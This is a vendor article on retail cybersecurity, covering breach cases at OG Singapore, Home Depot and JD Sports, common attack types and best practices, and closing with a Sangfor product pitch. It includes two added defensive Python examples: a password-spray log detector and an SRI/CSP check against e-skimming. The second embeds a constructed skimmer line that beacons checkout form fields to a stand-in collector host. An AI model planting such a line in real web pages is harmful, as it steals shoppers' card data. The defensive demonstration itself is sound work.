Retail revenue growth depends on the vendor's ability to deliver a seamless shopper experience by securely integrating its in-store and online presence. Any disruption caused by a cybersecurity incident, including loss of customer data or employee information or a breach of the point-of-sale system, damages the vendor's brand and has an economic ripple effect for years.
As retail digital transformation progressed, with the creation of a seamless customer experience, migration to the cloud, and full interconnection between the stores and the back office, attackers and scammers gained many new opportunities to profit from this next-generation retail environment.
The Rise of Retail Cyberattacks and the Need for Retail Cybersecurity
Before digital transformation and automation, and before e-commerce, global interlocking supply chains, and the frictionless customer experience, retailers relied on manual inventory counts, cash registers, and credit card processing over dedicated lines. These processes and systems were specific to a location and connected to a centralized back office. Most were closed-loop and siloed, which kept a breach at one site from propagating laterally. As more retail systems become interconnected, including e-commerce sites, databases, access control, and financial systems, a single intrusion can now reach several components at once.
As e-commerce and traditional retail merged their operations to grow top-line revenue, improve profitability, and streamline business processes, the merged environment also exposed more customer data and credit card information and created more points at which an attacker could breach several elements at once.
Retail cybersecurity largely meant meeting compliance mandates such as PCI DSS rather than fully implementing adaptive controls across the various components of the store and the online presence. That approach led to breaches that cost retailers millions in lost revenue, fines, and consumer confidence.
Key Cybersecurity Risks in Retail
With each breach becoming more public and costly, retailers continue to increase investment in protection strategies, engage managed services for monitoring and incident response, and invest in cybersecurity awareness training.
Even with these layers of protection in place, retail data remains an attractive target for attackers.
Data Breaches “All About the Money”
● IDC reported the growing interconnectivity of retail business ecosystems increases ransomware risks, with 36.4% of enterprises reporting that third-party supplier or customer systems were impacted.
OG Singapore (2022)
OG Singapore is a well-established retail chain that provides a wide array of quality products, catering to the diverse needs of its customers. With a strong focus on exceptional service and value, OG has become a beloved shopping destination for Singaporeans over the years.
Cost: Undetermined
The number of people affected is undetermined. The data breach affected a single database containing personal membership information.
Cause:
A third-party hosting system used by OG for membership portal services became compromised, possibly causing the data breach.
Resolution:
OG management emailed all customers affected by the incident and warned of possible email phishing attacks. Recipients should verify any email that appears to come from an OG domain to ensure it is not an attacker impersonating someone within the organization. The firm is working with law enforcement agencies in Singapore and security consultants to resolve the issue.
Home Depot
Home Depot is a leading home improvement retailer that offers a vast selection of tools, materials, and services for DIY enthusiasts and professional contractors alike. With a commitment to providing quality products and expert advice, Home Depot empowers customers to tackle their home projects with confidence.
Cost: 215 Million Dollars
Number of people affected: 52 Million.
Cause: Attackers used compromised third-party vendor credentials to access internal systems. Once inside, they deployed malware across several point-of-sale machines to capture customer credit card details and transactions.
Resolution:
Home Depot paid nearly $17 million in fines to settle various lawsuits. However, the penalties were only a tiny portion of the $198 million needed to implement additional cybersecurity controls, processes, and employee training to help prevent similar future breaches.
JD Sports
JD Sports is a premier retailer specializing in sports fashion and footwear, offering a diverse range of popular brands and exclusive collections. With a focus on style and performance, JD Sports caters to athletes and trendsetters alike, making it a go-to destination for the latest in sportswear.
Cost: Undisclosed
Number of People Affected: 10 Million
Cause: Attackers accessed a database containing retail purchases from 2018 to 2020 and exfiltrated sensitive customer information, including names, delivery information, addresses, email addresses, phone numbers, and the last four digits of payment cards.
Resolution: JD Sports did not provide public details about its resolution strategy or remediation, or whether any lawsuits are still pending.
The Most Common Types of Cyberattacks Affecting Retailers
While retailers face a wide range of cyberattacks, these are the most common:
- Data Breaches
- Phishing Attacks
- Malware and Ransomware Attacks
- E-Skimming
- Insider Threats
Data Breaches
Statista estimates that global retail e-commerce sales reached 5.8 trillion U.S. dollars and are projected to grow 39% to exceed eight trillion dollars by 2027.
That dollar amount continues to drive hackers' mobilization of attack efforts, including SQL injection, cross-site scripting, and password spraying, to steal data from retailers and e-commerce sites.
Security breaches will also continue to plague e-commerce and retailers, affecting customer information, employee data, inventory information, supply chain connector data, and credit card transactions.
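Of the three techniques named above, password spraying is the one most often missed by default controls, because it tries one or two common passwords against many accounts and never trips a per-account lockout. The following is an added Python example, not code from the original article, that runs a simple detector over constructed sample authentication log lines (the log format, hostnames and addresses are assumptions) and distinguishes a spray from ordinary brute force by counting distinct usernames per source address inside a time window:

```python
"""Password-spray detection over authentication logs.

Added example (not code from the original article). Password spraying tries one
or a few common passwords against many accounts, so each account sees only a
couple of failures and never trips a per-account lockout. The signal is therefore
per source address: many distinct usernames failing from one IP inside a short
window, with few failures per user. The log format below is a constructed,
simplified one; real IdP/SSO logs differ in layout but carry the same fields.
"""
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample log (not real data). One line per attempt:
# <ISO timestamp> auth result=<success|failure> user=<name> src=<ip>
SAMPLE_LOG = """\
2024-05-01T09:00:01 auth result=failure user=alice src=203.0.113.7
2024-05-01T09:00:02 auth result=failure user=bob src=203.0.113.7
2024-05-01T09:00:03 auth result=failure user=carol src=203.0.113.7
2024-05-01T09:00:04 auth result=failure user=dave src=203.0.113.7
2024-05-01T09:00:05 auth result=failure user=erin src=203.0.113.7
2024-05-01T09:00:06 auth result=failure user=frank src=203.0.113.7
2024-05-01T09:00:07 auth result=failure user=grace src=203.0.113.7
2024-05-01T09:00:08 auth result=failure user=heidi src=203.0.113.7
2024-05-01T09:00:09 auth result=success user=ivan src=203.0.113.7
2024-05-01T09:00:10 auth result=failure user=alice src=198.51.100.3
2024-05-01T09:00:11 auth result=failure user=alice src=198.51.100.3
2024-05-01T09:00:12 auth result=failure user=alice src=198.51.100.3
2024-05-01T09:00:13 auth result=failure user=alice src=198.51.100.3
2024-05-01T09:00:14 auth result=failure user=alice src=198.51.100.3
2024-05-01T09:00:15 auth result=failure user=alice src=198.51.100.3
2024-05-01T09:00:16 auth result=failure user=alice src=198.51.100.3
2024-05-01T09:00:17 auth result=failure user=alice src=198.51.100.3
2024-05-01T09:00:18 auth result=success user=bob src=192.0.2.9
2024-05-01T09:00:19 auth result=failure user=bob src=192.0.2.9
2024-05-01T09:00:20 auth result=success user=bob src=192.0.2.9
"""


def parse_line(line):
    """Split a log line into timestamp, result, user and source address."""
    ts_str, _, rest = line.split(" ", 2)
    fields = dict(kv.split("=", 1) for kv in rest.split())
    return {"ts": datetime.fromisoformat(ts_str), "result": fields["result"],
            "user": fields["user"], "src": fields["src"]}


def analyze_auth_log(log_text, window=timedelta(minutes=10), min_users=5,
                     max_per_user=3, lockout_threshold=5):
    """Classify each source address as password_spray or brute_force.

    A spray is >= min_users distinct accounts failing inside `window` with no
    single account failing more than max_per_user times (so it stays under a
    per-account lockout set at lockout_threshold). Brute force is the opposite:
    one account failing lockout_threshold or more times. For either, the
    accounts that then logged in successfully from the same source are listed;
    those are the first to reset and to check for MFA enrolment.
    """
    events = [parse_line(l) for l in log_text.splitlines() if l.strip()]
    by_src = defaultdict(list)
    for e in events:
        by_src[e["src"]].append(e)

    findings = {}
    for src, evs in by_src.items():
        fails = sorted((e for e in evs if e["result"] == "failure"),
                       key=lambda e: e["ts"])
        start = 0
        for end in range(len(fails)):
            # Slide the window so it spans at most `window` of failures.
            while fails[end]["ts"] - fails[start]["ts"] > window:
                start += 1
            counts = Counter(e["user"] for e in fails[start:end + 1])
            if len(counts) >= min_users and max(counts.values()) <= max_per_user:
                kind = "password_spray"
            elif max(counts.values()) >= lockout_threshold:
                kind = "brute_force"
            else:
                continue
            window_end = fails[end]["ts"] + window
            compromised = sorted({e["user"] for e in evs
                                  if e["result"] == "success"
                                  and fails[start]["ts"] <= e["ts"] <= window_end})
            findings[src] = {"kind": kind, "distinct_users": len(counts),
                             "failures": end - start + 1,
                             "successes_after": compromised}
    return findings


if __name__ == "__main__":
    for src, finding in analyze_auth_log(SAMPLE_LOG).items():
        print(src, finding)
```

In the constructed log, 203.0.113.7 fails once each against eight accounts and then succeeds as `ivan`, which a per-account lockout of five attempts would never catch; 198.51.100.3 hammers a single account and is ordinary brute force; 192.0.2.9 is a user mistyping a password and produces no finding. The thresholds are starting points to tune against the retailer's own baseline.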
Phishing Attacks
According to Deloitte, 91% of all cyberattacks start with an email phishing attack. Attackers continue to increase the effectiveness of phishing by using large language models such as ChatGPT to craft convincing messages in several languages with near-perfect grammar. Phishing messages often carry malware, malicious links, and rogue attachments.
Malware and Ransomware Attacks
Attackers, including those behind breaches like Home Depot's, commonly use email phishing to deliver malware. Once executed, malware lets the attacker take control of a device, install keyloggers, or encrypt files as part of a ransomware attack.
Ransomware attacks are very difficult for retailers to prevent. The email carrying the malware may appear to come from a customer, supply chain partner, or fellow employee, since attackers routinely impersonate these parties in business email compromise attacks.
E-Skimming
E-skimming is a rising problem for retailers and e-commerce sites. Physical credit card skimmers are all too common in retail: gas stations, restaurants, and retail outlets have all had skimmers installed on their card readers. E-skimmers are the online equivalent. Attackers inject malicious code into an e-commerce website, typically into a script the checkout page already loads, to intercept the buyer's credit card information as it is entered. The problem persists when e-commerce sites fall behind on patching and updating their web platforms and third-party scripts, leaving them open to malicious code injection.
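Because a skimmer has two halves, a tampered script and an outbound send of the captured card fields, the browser can be made to refuse both. The following is an added Python example, not code from the original article, that computes the Subresource Integrity (SRI) hash a checkout page should pin for a known-good script, shows that a tampered copy fails the check, and evaluates a simplified Content Security Policy to show that the skimmer's exfiltration destination is refused while the legitimate payment endpoint is allowed. The script contents, hostnames and policy are constructed for illustration:

```python
"""Browser-enforced controls against e-skimming: SRI and CSP.

Added example (not code from the original article). A skimmer usually arrives
as a modified copy of a script the checkout page already loads, and then sends
captured card fields to an attacker-controlled host. Subresource Integrity
pins the script's hash so the browser refuses a modified copy, and a Content
Security Policy connect-src/form-action allowlist makes the browser refuse the
outbound send. Hostnames, script contents and the policy below are constructed.
"""
import base64
import hashlib
import hmac

PAGE_ORIGIN = "https://shop.example"  # assumed checkout page origin
ORIGINAL_SCRIPT = b"window.checkout = function (form) { /* legitimate checkout logic */ };\n"
# Constructed tampered copy: original code plus a hook that beacons the form
# fields (card number, expiry, CVV) to an attacker host on every submit.
SKIMMED_SCRIPT = ORIGINAL_SCRIPT + (
    b"document.addEventListener('submit', e => navigator.sendBeacon("
    b"'https://stats-collector.example/c', new FormData(e.target)));\n")
CHECKOUT_CSP = ("default-src 'self'; script-src 'self' https://cdn.example; "
                "connect-src 'self' https://payments.example; form-action 'self'")


def sri_hash(script_bytes, algo="sha384"):
    """Integrity value as used in <script integrity=...>: algo-base64(digest)."""
    digest = hashlib.new(algo, script_bytes).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def script_tag(src, script_bytes):
    """Emit the pinned <script> tag for a known-good copy of the script."""
    return (f'<script src="{src}" integrity="{sri_hash(script_bytes)}" '
            f'crossorigin="anonymous"></script>')


def sri_matches(integrity_value, served_bytes):
    """What the browser does on load: recompute and compare; False = refuse to run."""
    algo = integrity_value.split("-", 1)[0]
    return hmac.compare_digest(sri_hash(served_bytes, algo), integrity_value)


def parse_csp(header):
    """Map each CSP directive name to its list of source expressions."""
    policy = {}
    for directive in header.split(";"):
        parts = directive.split()
        if parts:
            policy[parts[0]] = parts[1:]
    return policy


def origin_allowed(sources, page_origin, target_origin):
    """Simplified CSP source matching for whole origins (scheme://host).
    Supports 'none', 'self', explicit origins and *.host wildcards only."""
    target_host = target_origin.split("://", 1)[1]
    for src in sources:
        if src == "'none'":
            return False
        if src == "'self'" and target_origin == page_origin:
            return True
        if src.startswith("*.") and target_host.endswith(src[1:]):
            return True
        if src == target_origin:
            return True
    return False


def exfil_blocked(csp_header, page_origin, exfil_origin):
    """True if fetch/XHR/sendBeacon to exfil_origin would be refused.
    connect-src falls back to default-src when absent (form-action does not)."""
    policy = parse_csp(csp_header)
    sources = policy.get("connect-src", policy.get("default-src", []))
    return not origin_allowed(sources, page_origin, exfil_origin)


if __name__ == "__main__":
    print(script_tag("https://cdn.example/checkout.js", ORIGINAL_SCRIPT))
    pinned = sri_hash(ORIGINAL_SCRIPT)
    print("original loads:", sri_matches(pinned, ORIGINAL_SCRIPT))
    print("skimmed copy loads:", sri_matches(pinned, SKIMMED_SCRIPT))
    print("exfil blocked:", exfil_blocked(CHECKOUT_CSP, PAGE_ORIGIN,
                                          "https://stats-collector.example"))
```

SRI only protects scripts served from a fixed URL with a fixed content; a tag or pixel provider that ships frequently changing code has to be isolated another way, for example by loading it in a sandboxed iframe on a non-checkout origin. The CSP matcher here is deliberately simplified: real browsers also handle ports, paths, schemes and nonces, so the header should still be tested in a browser with report-only mode before enforcing it.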
Insider Threats
Retail has a high turnover rate. Many retail employees are hired for the season, and some are dismissed for retail theft.
Insider threat is another growing problem in retail cybersecurity, and it has an external counterpart: attackers impersonate retail employees, inventory buyers, and finance personnel to get fraudulent invoices paid, inventory shipments redirected, or bank transfers approved.
By the Numbers: Retail Cybersecurity Statistics
Retailers and online e-commerce business owners track several critical statistics when considering when and how they should upgrade their cybersecurity protection capabilities, expand their business, or decide to close down a retail location or website.
The Impact of Data Breaches on Retailers
Any data breach, regardless of location and size, is detrimental to the retailer. Despite the availability of security frameworks such as those from NIST and ISO 27001, retail lags other industries in adopting them, even though doing so simplifies meeting PCI DSS.
A concerning 62% of consumers are unsure whether their data is secure, and 25% of them lack confidence in retailers' ability to protect their information, highlighting the urgent need for retail organizations to rebuild consumer trust.
A hacker's access to customer data can cause current and future retail customers to lose confidence. A breach within the customer payment system can also lead to a loss of customer trust.
What is the Frequency of Retail Data Breaches in 2024?
- Retail organizations suffered a high number of breaches, with lack of budget the most-cited cause (37%)
- A survey by Viking Cloud reveals that 80% of retailers faced cyberattacks last year, with most experiencing multiple incidents, including malicious software attacks against their websites, attempts at fraudulent transactions, and a breach against their secure payment gateway.
What is the Average Cost of a Data Breach in the Retail Industry 2024?
IBM reported that in 2024 the average cost of a breach was $3.48 million in the retail sector and $3.91 million in the consumer sector. Although both figures are below the global average, retail costs rose 18% year over year, showing a rapid rise in risk.
Cybersecurity in Retail - Unique and Challenging to Prevent
Retail security vulnerabilities exist at many layers. The retail website, the backend database, username and password access control, and cloud storage are just a few of the areas attackers target.
Cyber risk is part of the landscape for e-commerce businesses. E-commerce sites often launch on basic components with little protection beyond what the hosting provider embeds in the platform or what was installed when the site was created.
Ultimately, the top priority for retailers with an online presence is getting the platform operational at the lowest possible cost. Retail product margins are thin; these businesses rely on volume, repeat business, and low return rates. Store operations have historically frowned upon security tools such as anti-virus, patching, and backups because they believed these tools slowed down in-store and online transactions.
Threat actors are well aware of this dilemma. They target retailers with minimal e-commerce security teams, or with only manual, physical security controls in their stores.
How Important is Cloud Security in Preventing Persistent Threats?
The cloud becomes the most significant component as retailers merge their in-store and online commerce strategies. With the cloud, retailers can run a common supply chain and ecosystem that supports both on-location and e-commerce sales. The cloud also provides strong security capabilities and redundancy. Under the shared responsibility model, however, the provider secures the underlying infrastructure while the retailer remains responsible for its own data, identities, and configuration. Retailers still need to invest in tools to protect their valuable information.
Best Practices for Retail Cybersecurity and Online Businesses
What are the most critical adaptive controls all retail and e-commerce providers need to implement to help reduce the attack surface within retail?
- Strong passwords and multifactor authentication are critical in stopping attacks. Weak or reused passwords let attackers take over accounts, and from those accounts steal data, plant malicious code, and erode the retailer's overall security posture. Enforcing a solid password policy and MFA across all elements of retail POS and e-commerce reduces attackers' ability to reach valuable data, and MFA in particular defeats the password-spraying and credential-stuffing attacks that a password policy alone cannot.
- Regular Security Audits and Penetration Testing by a third-party assessment team are critical for identifying known vulnerabilities and weaknesses in the enterprise. Assessments and penetration testing are required for PCI-DSS compliance.
- Maintaining PCI-DSS Compliance year-round, not just during the audit period, is far easier when the organization runs a continuous security management framework such as ISO 27001; the controls and evidence maintained for that framework carry over to sustaining PCI-DSS.
- Employee Training and awareness continue to be a positive factor in reducing email phishing attacks, social engineering, and employee impersonation attacks within retail stores. Awareness training, especially content based on real-world retail business cyberattacks and other common threats, helps teach employees, contractors, and business partners the importance of retail cybersecurity.
- Data encryption is required for PCI-DSS compliance: cardholder data must be protected in transit over open networks and rendered unreadable wherever it is stored. Beyond cardholder data, all retail and e-commerce data should be encrypted in transit and at rest.
- Network Security, especially within cloud instances, retail stores, and on-premise data centers, must include network segmentation, next-generation firewalls, email security solutions, data encryption, and anti-virus and anti-malware components.
- Investing in automated incident response is critical for retailers facing AI-enabled attacks, in which attackers adjust their tactics within seconds, changing context, tempo, and origin faster than a manual response can follow.
- Along with automated incident response, endpoint security integrated within extended detection and response (XDR) AI-powered solutions helps further reduce retail attack surfaces.
How Can Sangfor Help You Protect Your Retail Data?
Retail and e-commerce will continue to converge, sharing supply chains and the responsibility for protecting data against both physical and cyber theft. Implementing cybersecurity for retail requires a continuous commitment from the leadership team to invest in technology, people, and processes that reduce the attack surface and the cost per breach in the retail sector.
Sangfor's wide range of security & cloud products and services, including extended detection and response, next-generation firewalls, and secured hyper-converged platforms continue to make it a preferred partner across many industries, including finance, healthcare, retail, and customer services.
Click here to schedule your initial consultation today!